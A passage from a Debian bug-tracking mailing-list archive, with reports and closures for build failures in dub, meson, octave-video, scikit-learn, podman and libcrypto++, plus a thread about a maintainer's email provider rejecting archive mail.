symbols in Debian symbols files. For other C/C++ related build failures see the porting guide at http://gcc.gnu.org/gcc-11/porting_to.html GCC 11 defaults to the GNU++17 standard. If your package installs header files in /usr/include, please don't work around C++17 issues by choosing a lower C++ standard for the package build, but fix these issues to build with the C++17 standard. [...] dpkg-source: info: unpacking dub_1.27.0-2.debian.tar.xz Check disk space Sufficient free space for build User Environment APT_CONFIG=/var/lib/sbuild/apt.conf HOME=/sbuild-nonexistent LANG=C.UTF-8 LC_ALL=C.UTF-8 LOGNAME=user42 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games SCHROOT_ALIAS_NAME=unstable SCHROOT_CHROOT_NAME=sid-amd64-sbuild SCHROOT_COMMAND=env SCHROOT_GID=1001 SCHROOT_GROUP=user42 SCHROOT_SESSION_ID=sid-amd64-sbuild-f3191923-f8cc-42dd-9994-04857613935d SCHROOT_UID=1001 SCHROOT_USER=user42 SHELL=/bin/sh USER=user42 dpkg-buildpackage - Command: dpkg-buildpackage --sanitize-env -us -uc -b -rfakeroot dpkg-buildpackage: info: source package dub dpkg-buildpackage: info: source version 1.27.0-2 dpkg-buildpackage: info: source distribution unstable dpkg-buildpackage: info: source changed by Matthias Klumpp dpkg-source --before-build . dpkg-buildpackage: info: host architecture amd64 debian/rules clean dh clean debian/rules override_dh_auto_clean make[1]: Entering directory '/<>' dh_auto_clean rm -f /<>/scripts/man/*.1 make[1]: Leaving directory '/<>' dh_clean debian/rules binary dh binary dh_update_autotools_config dh_autoreconf debian/rules override_dh_auto_build make[1]: Entering directory '/<>' gdmd -run /<>/build.d \ -g -O -w -release Wrote version_.d` file with version: 1.27.0-2 Building dub using gdmd (dflags: ["-g", "-O", "-w", "-release", "-frelease"]), this may take a while... Command `["gdmd", "-of/<>/bin/dub", "-I/<>/source", "-version=DubUseCurl", "-version=DubApplication", "-g", "-O", "-w", "-release", "-frelease", "@build-files.txt"]` failed, output was: source/dub/dependency.d:779:9: error: Usage of the ‘body’ keyword is deprecated. Use ‘do’ instead. 779 | body | ^ source/dub/packagemanager.d:275:9: error: Usage of the ‘body’ keyword is deprecated. Use ‘do’ instead. 275 | body { | ^ source/dub/semver.d:106:1: error: Usage of the ‘body’ keyword is deprecated. Use ‘do’ instead. 106 | body { | ^ make[1]: *** [debian/rules:14: override_dh_auto_build] Error 1 make[1]: Leaving directory '/<>' make: *** [debian/rules:11: binary] Error 2 dpkg-buildpackage: error: debian/rules binary subprocess returned exit status 2 --- End Message --- --- Begin Message --- Source: dub Source-Version: 1.27.0-3 Done: Nilesh Patra We believe that the bug you reported is fixed in the latest version of dub, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the
Bug#1016668: kicad-packages3d - Unreachable maintainer
Well, Am 13.08.22 um 10:56 schrieb Bastian Blank: On Sat, Aug 13, 2022 at 10:41:09AM +0200, Carsten Schoenert wrote: | Action: failed | Final-Recipient: rfc822;c.schoen...@t-online.de | Status: 5.0.0 | Remote-MTA: dns; mx02.t-online.de | Diagnostic-Code: smtp; 554 IP=194.177.211.212 - A problem occurred. (Ask your postmaster for help or to contact t...@rx.t-online.de to clarify.) this can only be some temporary problem I think. While working on various uploads for the kicad-* packagas I did receive all related information emails from DAK, except this one. Also I haven't noticed any similar problems with other uploads that did happen after the kicad-* packages. No, this is a ongoing problem. We see reject messages at the ftp-master alias quite regularly. you see more here as I'm ever possible to see. It is a known problem with your selected e-mail provider. They block at least on of the debian.org mail relays. T-Online isn't a niche provider in Germany as you for sure know. I had only few problems in the past were I was needed to go in contact with the T-Online. And maybe I had always luck then, I was getting support well and quick enough. So far my experience is quite good with T-Online. I only know of one specific email provider in France which has regularly issues delivering emails to T-Online due rejects. And only one to two times a year I hear from some own hosted foreign email domain which gets similar problems you have seen. There isn't much I can do about this, I normally don't even get noticed about such problems. It should be somehow possible for Debian to get in contact with T-Online, I can try to ask our mail systems administrators which do also encounter rejects from various other email domains and the systems they run on. Maybe they have a personal contact person. -- Regards Carsten
Bug#1014417: marked as done (meson: test changes causes FTBFS)
Your message dated Sat, 13 Aug 2022 10:19:10 + with message-id and subject line Bug#1014417: fixed in meson 0.63.1-1 has caused the Debian Bug report #1014417, regarding meson: test changes causes FTBFS to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1014417: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014417 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: meson Version: 0.63.0-1 Severity: serious Tags: patch Control: affects -1 src:gjs gjs fails to build from source with the new meson. https://gitlab.gnome.org/GNOME/gjs/-/issues/490 The test output was overhauled in the new meson version so maybe that's related. Thank you, Jeremy Bicha --- End Message --- --- Begin Message --- Source: meson Source-Version: 0.63.1-1 Done: Jussi Pakkanen We believe that the bug you reported is fixed in the latest version of meson, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1014...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jussi Pakkanen (supplier of updated meson package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Sat, 13 Aug 2022 12:07:43 +0300 Source: meson Architecture: source Version: 0.63.1-1 Distribution: unstable Urgency: medium Maintainer: Jussi Pakkanen Changed-By: Jussi Pakkanen Closes: 1014417 1015132 Changes: meson (0.63.1-1) unstable; urgency=medium . * New upstream release. Closes: #1014417, #1015132. Checksums-Sha1: a32362fd8121f0d51ccd634cf4c589beb7959607 3483 meson_0.63.1-1.dsc e81d2915173324476693e585a785abed8fd1bbad 2064118 meson_0.63.1.orig.tar.gz 55e5cc5424bed66f923c1d0a8f6d009b95d8a249 14820 meson_0.63.1-1.debian.tar.xz d8fe69477fba8c4bc9914e718d8ec075b92b8ce0 35110 meson_0.63.1-1_source.buildinfo Checksums-Sha256: f8fc399c88d0805aab1b5a6cdc5ed30bcb7bb9fe09802872dfe6bbb130f11bc5 3483 meson_0.63.1-1.dsc 06fe13297213d6ff0121c5d5aab25a56ef938ffec57414ed6086fda272cb65e9 2064118 meson_0.63.1.orig.tar.gz e43b1f599a07bad3b3f807e592defde6ec175d54dc1764add59a2f5fbd2eb6b3 14820 meson_0.63.1-1.debian.tar.xz c16dc4a2df6bd8cdf6f3b584f106f1f429e06a0773773800573e651da184630c 35110 meson_0.63.1-1_source.buildinfo Files: 9af88645b836fd7fffe235e3e65cea1f 3483 devel optional meson_0.63.1-1.dsc 078e59d11a72b74c3bd78cb8205e9ed7 2064118 devel optional meson_0.63.1.orig.tar.gz 12cb6799a2424a6d6cbdbb77c3701075 14820 devel optional meson_0.63.1-1.debian.tar.xz af4718009fa4a18e2c4abbf72471fd2d 35110 devel optional meson_0.63.1-1_source.buildinfo -BEGIN PGP SIGNATURE- iQJHBAEBCgAxFiEEGeLW2bRtjapiiPh3wk5jG6ux/nAFAmL3apQTHGpwYWtrYW5l QGdtYWlsLmNvbQAKCRDCTmMbq7H+cIthEACewtxffqurNKD7dLfmf52XMCZ2hZlQ BXBm1YjDVd5mIxVYoLpsm8WKIj76PNEjnWQm13m+i65AQk+oh/9EOjrd0/dxJ90Y zsHIbpWuOkg8tJhgkauFuEh/mzYbp8V30lhjysrklj27iT5jJcAOYbWrHklQvQx9 kazYNAOVrXQU87Fq+T4E00F+Lc7PYYZjEMRmAahFRerBlJegB+TmtrKZp7/pFw/o 62G5b/rYJU0vAqBy8ECsa/FSM5sQ3vHi40IsOntjx1OQJvyjKgNRxm79rU78gqNn KP8oykdTKqXsdmY/XT4m8xC9GJHZyImge1CQOkCgh78NfOBRdQPbkcQmF09T2aJX wRWElthUElmxIGTiEwT3RvaCepzN4+le3F9uJrhafQ/93hePdluZU3eezkobJTRy 3dXQSlJ+5RmLEQ9fHdqbfc8WDONDcODA7MGFS04ONbzF3EqyQYSYzfOg2G1NjtQ8 tvjAhVLUSNWN9CnCE0rhCFIZXKjjJrSgTApxqCQKRsCwZb5YwMfu//haFlJpo9Hv dKSjeojOVHrNECOr6gh+Bg/61rWVTH50HAVXie2IaEtnfnlG0hzK+31Z8p5sjSpF USB92ZfVGC8o5ygxxlKKs8YDWCIB41c1Th+uRRP/rX//bHnevWL2TK6lzEbJ6F5U 6Jw0YxnBvJcWDA== =RomF -END PGP SIGNATURE End Message ---
Bug#1015132: marked as done (meson: FTBFS: test_junit_valid_gtest: Element 'testcase', attribute 'file': The attribute 'file' is not allowed)
Your message dated Sat, 13 Aug 2022 10:19:10 + with message-id and subject line Bug#1015132: fixed in meson 0.63.1-1 has caused the Debian Bug report #1015132, regarding meson: FTBFS: test_junit_valid_gtest: Element 'testcase', attribute 'file': The attribute 'file' is not allowed to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1015132: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1015132 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: meson Version: 0.63.0-1 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20220716 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > /usr/bin/ld: bobuser.p/bobuser.c.o: in function `main': > ./b 52a78b9866/../test cases/failing build/2 hidden symbol/bobuser.c:4: > undefined reference to `hidden_function' > collect2: error: ld returned 1 exit status The full build log is available from: http://qa-logs.debian.net/2022/07/16/meson_0.63.0-1_unstable.log All bugs filed during this archive rebuild are listed at: https://bugs.debian.org/cgi-bin/pkgreport.cgi?tag=ftbfs-20220716;users=lu...@debian.org or: https://udd.debian.org/bugs/?release=na=ign=7=7=only=ftbfs-20220716=lu...@debian.org=1=1=1=1#results A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! If you reassign this bug to another package, please marking it as 'affects'-ing this package. See https://www.debian.org/Bugs/server-control#affects If you fail to reproduce this, please provide a build log and diff it with mine so that we can identify if something relevant changed in the meantime. --- End Message --- --- Begin Message --- Source: meson Source-Version: 0.63.1-1 Done: Jussi Pakkanen We believe that the bug you reported is fixed in the latest version of meson, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1015...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jussi Pakkanen (supplier of updated meson package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Sat, 13 Aug 2022 12:07:43 +0300 Source: meson Architecture: source Version: 0.63.1-1 Distribution: unstable Urgency: medium Maintainer: Jussi Pakkanen Changed-By: Jussi Pakkanen Closes: 1014417 1015132 Changes: meson (0.63.1-1) unstable; urgency=medium . * New upstream release. Closes: #1014417, #1015132. Checksums-Sha1: a32362fd8121f0d51ccd634cf4c589beb7959607 3483 meson_0.63.1-1.dsc e81d2915173324476693e585a785abed8fd1bbad 2064118 meson_0.63.1.orig.tar.gz 55e5cc5424bed66f923c1d0a8f6d009b95d8a249 14820 meson_0.63.1-1.debian.tar.xz d8fe69477fba8c4bc9914e718d8ec075b92b8ce0 35110 meson_0.63.1-1_source.buildinfo Checksums-Sha256: f8fc399c88d0805aab1b5a6cdc5ed30bcb7bb9fe09802872dfe6bbb130f11bc5 3483 meson_0.63.1-1.dsc 06fe13297213d6ff0121c5d5aab25a56ef938ffec57414ed6086fda272cb65e9 2064118 meson_0.63.1.orig.tar.gz e43b1f599a07bad3b3f807e592defde6ec175d54dc1764add59a2f5fbd2eb6b3 14820 meson_0.63.1-1.debian.tar.xz c16dc4a2df6bd8cdf6f3b584f106f1f429e06a0773773800573e651da184630c 35110 meson_0.63.1-1_source.buildinfo Files: 9af88645b836fd7fffe235e3e65cea1f 3483 devel optional meson_0.63.1-1.dsc 078e59d11a72b74c3bd78cb8205e9ed7 2064118 devel optional meson_0.63.1.orig.tar.gz 12cb6799a2424a6d6cbdbb77c3701075 14820 devel optional meson_0.63.1-1.debian.tar.xz af4718009fa4a18e2c4abbf72471fd2d 35110 devel optional meson_0.63.1-1_source.buildinfo -BEGIN PGP SIGNATURE- iQJHBAEBCgAxFiEEGeLW2bRtjapiiPh3wk5jG6ux/nAFAmL3apQTHGpwYWtrYW5l QGdtYWlsLmNvbQAKCRDCTmMbq7H+cIthEACewtxffqurNKD7dLfmf52XMCZ2hZlQ BXBm1YjDVd5mIxVYoLpsm8WKIj76PNEjnWQm13m+i65AQk+oh/9EOjrd0/dxJ90Y zsHIbpWuOkg8tJhgkauFuEh/mzYbp8V30lhjysrklj27iT5jJcAOYbWrHklQvQx9 kazYNAOVrXQU87Fq+T4E00F+Lc7PYYZjEMRmAahFRerBlJegB+TmtrKZp7/pFw/o 62G5b/rYJU0vAqBy8ECsa/FSM5sQ3vHi40IsOntjx1OQJvyjKgNRxm79rU78gqNn KP8oykdTKqXsdmY/XT4m8xC9GJHZyImge1CQOkCgh78NfOBRdQPbkcQmF09T2aJX wRWElthUElmxIGTiEwT3RvaCepzN4+le3F9uJrhafQ/93hePdluZU3eezkobJTRy
Bug#1004770: octave-video: Use this patch instead
Complementing my message below, the unit test in inst/VideWriter.m passed successfully when the sources were compiled against ffmpeg 4, for instance in this build: https://buildd.debian.org/status/fetch.php?pkg=octave-video=amd64=2.0.2-1%2Bb2=1650535691=0 * Rafael Laboissière [2022-08-13 10:49]: * William 'jawn-smith' Wilson [2022-08-02 17:35]: Package: octave-video Followup-For: Bug #1004770 User: ubuntu-de...@lists.ubuntu.com Usertags: origin-ubuntu kinetic ubuntu-patch Control: tags -1 patch Dear Maintainer, The first patch I submitted was a bit messy and failed to build with older versions of ffmpeg. A version with this patch has built successfully for me in Ubuntu kinetic and Debian sid. In Ubuntu, the attached patch was applied to achieve the following: * d/patches/ffmpeg5.patch: Update to FFMPEG 5 API. Thanks for considering the patch. Thank you for your patch. The package builds fine on my amd64 Debian sid system against ffmpeg 5. However, one of the unit test is failing: $ echo 'pkg load video; test VideoWriter' | octave-cli -q fatal: caught signal Segmentation fault -- stopping myself... Segmentation fault Further investigation, when running the code of the unit test by hand, shows that the problem happens in the method writeVideo of the VideoWriter class: $ octave-cli -q octave:1> pkg load video octave:2> fn = fullfile (tempdir(), "rainbow.mp4"); octave:3> width = 200; octave:4> height = 150; octave:5> nframes = 120; octave:6> p = permute (rainbow (width), [3 1 2]); octave:7> raw_video = zeros (height, width, 3, nframes); octave:8> w = VideoWriter (fn); octave:9> for k=1:nframes disp (k) ps = circshift (p, k * 6); img = uint8 (255 * repmat (ps, height, 1)); raw_video (:, :, :, k) = img; writeVideo (w, img); endfor 1 fatal: caught signal Segmentation fault -- stopping myself... Segmentation fault Ultimately, I noticed that the problem arises in the call of the function __writer_open__, defined in src/cap_ffmpeg_wrapper.cc. Do you experience the same problem in your system? Best, Rafael Laboissière
Bug#1016668: kicad-packages3d - Unreachable maintainer
On Sat, Aug 13, 2022 at 10:41:09AM +0200, Carsten Schoenert wrote: > > | Action: failed > > | Final-Recipient: rfc822;c.schoen...@t-online.de > > | Status: 5.0.0 > > | Remote-MTA: dns; mx02.t-online.de > > | Diagnostic-Code: smtp; 554 IP=194.177.211.212 - A problem occurred. (Ask > > your postmaster for help or to contact t...@rx.t-online.de to clarify.) > > this can only be some temporary problem I think. > While working on various uploads for the kicad-* packagas I did receive > all related information emails from DAK, except this one. > Also I haven't noticed any similar problems with other uploads that did > happen after the kicad-* packages. No, this is a ongoing problem. We see reject messages at the ftp-master alias quite regularly. It is a known problem with your selected e-mail provider. They block at least on of the debian.org mail relays. Bastian -- We Klingons believe as you do -- the sick should die. Only the strong should live. -- Kras, "Friday's Child", stardate 3497.2
Bug#1016668: marked as done (kicad-packages3d - Unreachable maintainer)
Your message dated Sat, 13 Aug 2022 10:41:09 +0200 with message-id and subject line Re: Bug#1016668: kicad-packages3d - Unreachable maintainer has caused the Debian Bug report #1016668, regarding kicad-packages3d - Unreachable maintainer to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016668 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: kicad-packages3d Version: 6.0.7-1 Severity: serious Mails sent by the archive to the maintainer are rejected with the following message: | Action: failed | Final-Recipient: rfc822;c.schoen...@t-online.de | Status: 5.0.0 | Remote-MTA: dns; mx02.t-online.de | Diagnostic-Code: smtp; 554 IP=194.177.211.212 - A problem occurred. (Ask your postmaster for help or to contact t...@rx.t-online.de to clarify.) Bastian -- System Information: Debian Release: bookworm/sid APT prefers testing APT policy: (700, 'testing'), (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 5.17.0-2-amd64 (SMP w/4 CPU threads; PREEMPT) Kernel taint flags: TAINT_WARN Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled --- End Message --- --- Begin Message --- Hello Bastian, Am Thu, Aug 04, 2022 at 11:19:10PM +0200 schrieb Bastian Blank: > Source: kicad-packages3d > Version: 6.0.7-1 > Severity: serious > > Mails sent by the archive to the maintainer are rejected with the > following message: > > | Action: failed > | Final-Recipient: rfc822;c.schoen...@t-online.de > | Status: 5.0.0 > | Remote-MTA: dns; mx02.t-online.de > | Diagnostic-Code: smtp; 554 IP=194.177.211.212 - A problem occurred. (Ask > your postmaster for help or to contact t...@rx.t-online.de to clarify.) this can only be some temporary problem I think. While working on various uploads for the kicad-* packagas I did receive all related information emails from DAK, except this one. Also I haven't noticed any similar problems with other uploads that did happen after the kicad-* packages. The interesting part for the reject of the email would be of course the detailed reason for the reject. But these reject did happen really really rare. I'd like to close this report for thast reason, I've postponed a quick answer on your initial report to see if there was/is really a problem with delivering emails to my account on T-Online. Happily I can't still see anything. Regards Carsten--- End Message ---
Bug#1004770: octave-video: Use this patch instead
* William 'jawn-smith' Wilson [2022-08-02 17:35]: Package: octave-video Followup-For: Bug #1004770 User: ubuntu-de...@lists.ubuntu.com Usertags: origin-ubuntu kinetic ubuntu-patch Control: tags -1 patch Dear Maintainer, The first patch I submitted was a bit messy and failed to build with older versions of ffmpeg. A version with this patch has built successfully for me in Ubuntu kinetic and Debian sid. In Ubuntu, the attached patch was applied to achieve the following: * d/patches/ffmpeg5.patch: Update to FFMPEG 5 API. Thanks for considering the patch. Thank you for your patch. The package builds fine on my amd64 Debian sid system against ffmpeg 5. However, one of the unit test is failing: $ echo 'pkg load video; test VideoWriter' | octave-cli -q fatal: caught signal Segmentation fault -- stopping myself... Segmentation fault Further investigation, when running the code of the unit test by hand, shows that the problem happens in the method writeVideo of the VideoWriter class: $ octave-cli -q octave:1> pkg load video octave:2> fn = fullfile (tempdir(), "rainbow.mp4"); octave:3> width = 200; octave:4> height = 150; octave:5> nframes = 120; octave:6> p = permute (rainbow (width), [3 1 2]); octave:7> raw_video = zeros (height, width, 3, nframes); octave:8> w = VideoWriter (fn); octave:9> for k=1:nframes disp (k) ps = circshift (p, k * 6); img = uint8 (255 * repmat (ps, height, 1)); raw_video (:, :, :, k) = img; writeVideo (w, img); endfor 1 fatal: caught signal Segmentation fault -- stopping myself... Segmentation fault Ultimately, I noticed that the problem arises in the call of the function __writer_open__, defined in src/cap_ffmpeg_wrapper.cc. Do you experience the same problem in your system? Best, Rafael Laboissière
Bug#1003165: scikit-learn testing migration
On 8/13/22 13:34, Andreas Tille wrote: The drawback of this solution is that we will not get any warning for new *potentially more important* issues since all test failures will be ignored now. For me this is outweighted by the advantage that we can present upstream a full log of all issues in certain architectures and can open according issues. I admit I'm not really enthusiastic that upstream will care much about this - but at least we have the logs at hand and can do something in case someone wants to invest time into this. Considering long term maintainance this does not seem to be nice especially keeping in mind the fact that sklearn is a key package. I think it is OK to do it _for the moment_ to allow the dust to settle a bit, and rm'ed packages to get to their destination once again but I'd suggest ``incrementally'' enabling the tests once everything is in place. I agree that upstream is probably not very enthusiastic about fixing those, but if we get fixes, we should keep propagating them. In a nutshell, IMO the sklearn revision that enters bookworm _should_ have tests enabled, without hacks and the tests that do not pass can be disabled (after all, it does not come from our end) I do not plan to close bugs #1003165 and #1008369 but I think it is appropriate to reduce its severity to important and thus enable the package and its dependencies to migrate to testing (I have not checked debci yet). Sounds good, and thanks for caring for it. [1] https://salsa.debian.org/science-team/scikit-learn/-/blob/master/debian/rules#L227 -- Best, Nilesh
Bug#1016195: marked as done (podman: fails to run any container)
Your message dated Sat, 13 Aug 2022 10:23:37 +0200 with message-id and subject line Re: Bug#1016195: has caused the Debian Bug report #1016195, regarding podman: fails to run any container to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016195: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016195 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: podman Version: 3.0.1+dfsg1-3+deb11u1 Severity: grave Justification: renders package unusable X-Debbugs-Cc: vincent.olivert.ri...@gmail.com Dear Maintainer, I'm strictly running Debian stable with no packages from testing or unstable. When trying to run any container with podman I see the following error: $ podman run --rm -it debian:bullseye-slim bash Error: OCI runtime error: container_linux.go:367: starting container process caused: process_linux.go:340: applying cgroup configuration for process caused: error while starting unit "libpod-410aba7b65566d9ddf2f0d2f188a22ed53577b90eea67e773c8294fa8bd252f3.scope" with properties [{Name:Description Value:"libcontainer container 410aba7b65566d9ddf2f0d2f188a22ed53577b90eea67e773c8294fa8bd252f3"} {Name:Slice Value:"user.slice"} {Name:PIDs Value:@au [69240]} {Name:Delegate Value:true} {Name:MemoryAccounting Value:true} {Name:CPUAccounting Value:true} {Name:IOAccounting Value:true} {Name:DefaultDependencies Value:false} {Name:DevicePolicy Value:"strict"} {Name:DeviceAllow Value:@a(ss) []} {Name:DeviceAllow Value:["INVALID", "INVALID", "INVALID", "INVALID", "INVALID", "INVALID", "INVALID", "INVALID", "INVALID", "INVALID", "INVALID"]} {Name:TasksAccounting Value:true} {Name:TasksMax Value:@t 2048}]: error creating systemd unit `libpod-410aba7b65566d9ddf2f0d2f188a22ed53577b90eea67e773c8294fa8bd252f3.scope`: got `failed` I tried replacing runc with crun, but the same problem persist, although the error message is shorter: $ podman run --rm -it debian:bullseye-slim bash Error: OCI runtime error: error creating systemd unit `libpod-df9c347e24f4ea213f8c81d6211f60e015e48b2f4b9118558f9fa95f8c7610fd.scope`: got `failed` Just in case it matters, my system is up to date and the version of systemd I have installed is 247.3-7. -- System Information: Debian Release: 11.4 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable') Architecture: arm64 (aarch64) Kernel: Linux 5.10.0-16-arm64 (SMP w/4 CPU threads) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages podman depends on: ii conmon 2.0.25+ds1-1.1 ii containernetworking-plugins 0.9.0-1+b6 ii golang-github-containers-common 0.33.4+ds1-1+deb11u1 ii init-system-helpers 1.60 ii iptables 1.8.7-1 ii libc62.31-13+deb11u3 ii libdevmapper1.02.1 2:1.02.175-2.1 ii libgpgme11 1.14.0-1+b2 ii libseccomp2 2.5.1-1+deb11u1 ii runc 1.0.0~rc93+ds1-5+deb11u2 Versions of packages podman recommends: ii buildah 1.19.6+dfsg1-1+b6 ii fuse-overlayfs1.4.0-1 ii golang-github-containernetworking-plugin-dnsname 1.1.1+ds1-4+b7 ii slirp4netns 1.0.1-2 ii tini 0.19.0-1 ii uidmap1:4.8.1-1 Versions of packages podman suggests: pn containers-storage pn docker-compose -- no debconf information --- End Message --- --- Begin Message --- Thanks for reporting back. I was quite puzzled by your report and couldn't reproduce it. On Mon, Aug 8, 2022 at 3:09 AM V O wrote: > I don't know why, but the problem seems to be fixed after a reboot and I'm > no longer able to reproduce it. > > I guess this bug can be closed. > -- regards, Reinhard --- End Message ---
Bug#1003165: scikit-learn testing migration
Hi again, Am Thu, Aug 04, 2022 at 01:25:42PM +0200 schrieb Andreas Tille: > Am Fri, Jul 29, 2022 at 06:09:26AM +0200 schrieb Andreas Tille: > Before we fall into another "do nothing" period: I will upload > scikit-learn restricted to those architectures only which have all tests > passing and will ask ftpmaster for removal of the others. If you think > this is a bad idea please give good reasons not to do so or even better > fix the package for the problematic architectures. When looking at the rules file I noticed that we currently exclude (more or less randomly) certain tests for certain architectures. So I had two options: 1. Simply add the other failing tests 2. Ignore all failures but print the failures into the build logs I decided for the latter now in scikit-learn_1.1.2+dfsg-3 and you see that the package is building now. I've added according README.Debian which are *architecture specific*[1] to inform our users about poptential issues. The drawback of this solution is that we will not get any warning for new *potentially more important* issues since all test failures will be ignored now. For me this is outweighted by the advantage that we can present upstream a full log of all issues in certain architectures and can open according issues. I admit I'm not really enthusiastic that upstream will care much about this - but at least we have the logs at hand and can do something in case someone wants to invest time into this. I do not plan to close bugs #1003165 and #1008369 but I think it is appropriate to reduce its severity to important and thus enable the package and its dependencies to migrate to testing (I have not checked debci yet). Any comments about this strategy? Kind regards Andreas. [1] https://salsa.debian.org/science-team/scikit-learn/-/blob/master/debian/rules#L227 -- http://fam-tille.de
Bug#1012974: marked as done (libcrypto++: ftbfs with GCC-12)
Your message dated Sat, 13 Aug 2022 07:34:02 + with message-id and subject line Bug#1012974: fixed in libcrypto++ 8.7.0-1 has caused the Debian Bug report #1012974, regarding libcrypto++: ftbfs with GCC-12 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1012974: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1012974 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:libcrypto++ Version: 8.6.0-3 Severity: normal Tags: sid bookworm User: debian-...@lists.debian.org Usertags: ftbfs-gcc-12 [This bug is targeted to the upcoming bookworm release] Please keep this issue open in the bug tracker for the package it was filed for. If a fix in another package is required, please file a bug for the other package (or clone), and add a block in this package. Please keep the issue open until the package can be built in a follow-up test rebuild. The package fails to build in a test rebuild on at least amd64 with gcc-12/g++-12, but succeeds to build with gcc-11/g++-11. The severity of this report will be raised before the bookworm release. The full build log can be found at: http://qa-logs.debian.net/2022/06/09/gcc12/libcrypto++_8.6.0-3_unstable_gcc12.log The last lines of the build log are at the end of this report. To build with GCC 11, either set CC=gcc-11 CXX=g++-11 explicitly, or install the gcc, g++, gfortran, ... packages from experimental. apt-get -t=experimental install g++ Common build failures are new warnings resulting in build failures with -Werror turned on, or new/dropped symbols in Debian symbols files. For other C/C++ related build failures see the porting guide at http://gcc.gnu.org/gcc-11/porting_to.html GCC 11 defaults to the GNU++17 standard. If your package installs header files in /usr/include, please don't work around C++17 issues by choosing a lower C++ standard for the package build, but fix these issues to build with the C++17 standard. [...] passedsignature and verification passedchecking invalid signature passedbrainpoolP256r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP320r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP192r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP256r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP320r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP192r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP256r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP320r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP192r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP256r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP320r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP192r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP256r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP320r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP192r1 using RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature passedbrainpoolP256r1 using 